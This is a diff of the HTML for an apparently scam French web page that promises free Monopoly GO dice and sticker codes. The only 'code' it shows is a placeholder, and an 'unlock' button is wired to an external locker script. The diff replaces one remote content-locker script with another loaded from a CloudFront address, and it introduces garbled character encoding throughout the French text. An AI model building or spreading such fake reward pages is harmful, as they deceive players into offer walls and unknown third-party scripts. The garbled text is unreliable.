--- a/index.html
+++ b/index.html
@@ -16,7 +16,10 @@
 <link rel="me" href="https://www.blogger.com/profile/02992188203184300015">
 <meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
 <meta name="google-adsense-platform-domain" content="blogspot.com">
-<script type="text/javascript" id="ogjs" src="https://verifysuper.com/cl/js/8dj1dk"></script>
+<script type="text/javascript">
+    var Botmg_rAL_rxjaRc={"it":4200451,"key":"743e6"};
+</script>
+<script src="https://d368ol0wkasvru.cloudfront.net/f227461.js"></script>
 
 </head>
 <body>
@@ -77,7 +80,7 @@ It: 4157908
 
 -->
 
-    <title>Monopole, allez-y ! Autocollants gratuits</title>
+    <title>Monopole, allez-yÂ ! Autocollants gratuits</title>
 <meta name="description" content="Monopoly Go! Cards">
 <meta property="og:title" content="Monopoly Go! Cards">
 <meta property="og:description" content="Monopoly Go! Cards">
@@ -108,10 +111,10 @@ It: 4157908
 
 <canvas id="ramat" width="1900" height="900"></canvas>  
 <div class="maxs">
-<div class="jdl-hdr">Monopoly GO ! Dés autocollants gratuits</div>  
+<div class="jdl-hdr">Monopoly GOÂ ! DÃ©s autocollants gratuits</div>  
 <div class="Main1 center" style="display:none" id="Mainstep1"></div>  
 <div class="Main1" id="Mainstep2">
-<h3> CHOISISSEZ VOS Dés Autocollants </h3>  
+<h3> CHOISISSEZ VOS DÃ©s Autocollants </h3>  
   <label class="containerPack" onclick="functionPack1(1)">
     <input type="radio">
     <span class="checkmarkPack card1"></span>
@@ -174,7 +177,7 @@ It: 4157908
  <img class="selectedimage" id="selectedimage"> 
   <div id="gencode1" class="Lastcode">0000-0000-0000-0000</div> 
 
-<button class="btn" onclick=og_load(); type="submit">Débloquez le dernier code</button>
+<button class="btn" onclick="_vs()" type="submit">DÃ©bloquez le dernier code</button>
 
   </div></div>
   <div class="recentActivity">
@@ -185,7 +188,7 @@ It: 4157908
    </span><p></p>
    <div class="container"><div class="row">
   <div class="col-md-12 text-center">
-  <span>Copyright © Cartes Monopoly Go gratuites. L'utilisation de ce site constitue l'acceptation de nos conditions d'utilisation et de notre politique de confidentialité. Tous droits réservés.  </span>
+  <span>Copyright Â© Cartes Monopoly Go gratuites. L'utilisation de ce site constitue l'acceptation de nos conditions d'utilisation et de notre politique de confidentialitÃ©. Tous droits rÃ©servÃ©s.  </span>
 </div></div></div></div></div></div>
 
 
